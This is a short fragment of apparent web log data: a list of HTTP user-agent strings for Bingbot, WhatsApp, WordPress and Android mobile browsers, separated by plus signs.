+http://www.bing.com/bingbot.htm), XFF:207.46.13.108 +WhatsApp/2.21.23.14 A +WordPress/5.8.2; https://blogchain.com.ua +WhatsApp/2.16.352 Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Safari/537.36 +WhatsApp/2.16.259 Mozilla/5.0 (Linux; Unix 10.0; MHA-L29 Build/HUAWEIMHA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 + + + +